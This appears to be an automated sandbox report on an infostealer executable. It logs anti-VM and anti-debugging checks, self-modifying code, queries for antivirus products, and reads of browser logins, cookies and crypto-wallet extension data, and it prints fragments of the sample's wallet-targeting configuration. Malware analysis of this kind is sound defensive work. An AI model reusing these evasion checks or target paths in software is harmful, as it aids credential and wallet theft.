                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE032A second address: 4FE036A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF17CBED4EAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007FF17CBED4F0h 0x0000000f push eax 0x00000010 jmp 00007FF17CBED4EBh 0x00000015 xchg eax, edi 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FF17CBED4F0h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE036A second address: 4FE0379 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF17CC823ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE03AA second address: 4FE03AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE03AE second address: 4FE03B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE03B4 second address: 4FE03DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF17CBED4F5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 inc ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF17CBED4EDh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE03DD second address: 4FE03E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE0551 second address: 4FE05C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF17CBED4F1h 0x00000008 push ecx 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d test eax, eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FF17CBED4EFh 0x00000018 adc ax, EF2Eh 0x0000001d jmp 00007FF17CBED4F9h 0x00000022 popfd 0x00000023 pushfd 0x00000024 jmp 00007FF17CBED4F0h 0x00000029 adc si, A4A8h 0x0000002e jmp 00007FF17CBED4EBh 0x00000033 popfd 0x00000034 popad 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE05C1 second address: 4FE05F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 1F49774Ah 0x00000008 mov eax, edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jg 00007FF1EE8D0264h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jmp 00007FF17CC823B6h 0x0000001b mov cx, C211h 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE05F2 second address: 4FE05F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 6D37AA instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 6D38A0 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 6D376E instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 8883C0 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 90187D instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 636DC86 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 636DD49 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 636DC8C instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 65199C0 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 6519695 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 6542C8F instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 65B157C instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06509749 rdtsc 0_2_06509749
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06504025 sidt fword ptr [esp-02h]0_2_06504025
                Source: C:\Users\user\Desktop\file.exe TID: 796Thread sleep time: -38019s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 2852Thread sleep time: -50025s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 6888Thread sleep time: -32000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 4564Thread sleep time: -210000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 5232Thread sleep time: -34017s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 5884Thread sleep time: -64032s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 3712Thread sleep time: -46023s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 2940Thread sleep time: -34017s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: file.exe, file.exe, 00000000.00000002.1941739792.0000000000857000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1948030342.00000000064FA000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000003.1566109133.000000000598C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696494690p
                Source: file.exe, 00000000.00000003.1566109133.0000000005987000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
                Source: file.exe, 00000000.00000002.1944171939.000000000111E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
                Source: file.exe, 00000000.00000003.1566109133.0000000005987000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
                Source: file.exe, 00000000.00000003.1566109133.0000000005987000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
                Source: file.exe, 00000000.00000003.1566109133.0000000005987000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
                Source: file.exe, 00000000.00000003.1566109133.0000000005987000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                Source: file.exe, 00000000.00000003.1566109133.0000000005987000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                Source: file.exe, 00000000.00000003.1566109133.0000000005987000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                Source: file.exe, 00000000.00000003.1566109133.0000000005987000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
                Source: file.exe, 00000000.00000003.1566109133.0000000005987000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                Source: file.exe, 00000000.00000003.1566109133.0000000005987000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                Source: file.exe, 00000000.00000003.1566109133.0000000005987000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                Source: file.exe, 00000000.00000003.1566109133.0000000005987000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
                Source: file.exe, 00000000.00000003.1850545597.000000000117E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1944171939.000000000117E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1944171939.000000000117E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                Source: file.exe, 00000000.00000003.1566109133.0000000005987000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                Source: file.exe, 00000000.00000003.1566109133.0000000005987000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                Source: file.exe, 00000000.00000003.1566109133.0000000005987000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                Source: file.exe, 00000000.00000003.1566109133.0000000005987000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                Source: file.exe, 00000000.00000003.1566109133.0000000005987000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                Source: file.exe, 00000000.00000003.1566109133.0000000005987000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                Source: file.exe, 00000000.00000003.1566109133.0000000005987000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
                Source: file.exe, 00000000.00000003.1566109133.0000000005987000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                Source: file.exe, 00000000.00000002.1944171939.000000000117E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: file.exe, 00000000.00000003.1566109133.0000000005987000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                Source: file.exe, 00000000.00000003.1566109133.0000000005987000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
                Source: file.exe, 00000000.00000003.1566109133.0000000005987000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
                Source: file.exe, 00000000.00000003.1566109133.0000000005987000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                Source: file.exe, 00000000.00000003.1566109133.0000000005987000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
                Source: file.exe, 00000000.00000003.1566109133.0000000005987000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                Source: file.exe, 00000000.00000003.1566109133.0000000005987000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                Source: file.exe, 00000000.00000003.1566109133.0000000005987000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                Source: file.exe, 00000000.00000002.1941739792.0000000000857000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1948030342.00000000064FA000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: file.exe, 00000000.00000003.1566109133.0000000005987000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                Source: file.exe, 00000000.00000003.1566109133.0000000005987000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                Source: file.exe, 00000000.00000003.1566109133.0000000005987000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06509749 rdtsc 0_2_06509749
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B71F0 LdrInitializeThunk,0_2_006B71F0
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
                Source: file.exeBinary or memory string: Program Manager
                Source: file.exe, 00000000.00000002.1941739792.0000000000857000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
                Source: file.exe, file.exe, 00000000.00000002.1948030342.00000000064FA000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: /Program Manager
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: file.exe, 00000000.00000003.1648902245.00000000011F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6376, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: file.exe, 00000000.00000003.1541778568.00000000011EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ctrum\\wallets","m":["*"],"z":"Wallets/Electrum","d":0,"fs":20971520},{"
                Source: file.exe, 00000000.00000003.1541778568.00000000011EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":["*"],"z
                Source: file.exe, 00000000.00000003.1594408142.00000000011E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Chrome/Default/Extensions/Jaxx Liberty
                Source: file.exe, 00000000.00000003.1541778568.00000000011EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Bi
                Source: file.exe, 00000000.00000003.1541778568.00000000011EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus if
                Source: file.exe, 00000000.00000003.1850388893.00000000011F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: exodus if
                Source: file.exe, 00000000.00000003.1541778568.00000000011EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance x
                Source: file.exe, 00000000.00000003.1541778568.00000000011EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus if
                Source: file.exe, 00000000.00000003.1594408142.00000000011E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: file.exe, 00000000.00000003.1594408142.00000000011E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
